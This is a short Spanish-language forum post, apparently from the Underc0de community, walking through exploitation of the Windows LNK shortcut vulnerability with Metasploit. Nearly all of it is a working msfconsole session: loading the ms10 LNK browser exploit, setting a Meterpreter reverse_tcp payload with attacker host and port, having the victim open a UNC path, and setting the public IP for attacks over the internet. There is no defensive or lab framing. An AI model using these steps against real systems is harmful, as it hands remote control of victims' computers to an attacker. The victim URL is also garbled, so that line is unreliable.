Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.
Primero hay que actualizar Metasploit.
#msfupdate
Luego configuramos Metasploit como sigue:
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
Luego en el navegador de la PC víctima visitamos la siguiente URL:
\192.168.0.33QueHeTwEW
Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.
Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254
Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.
Bueno espero que os haya ayudado. ¡Saludos!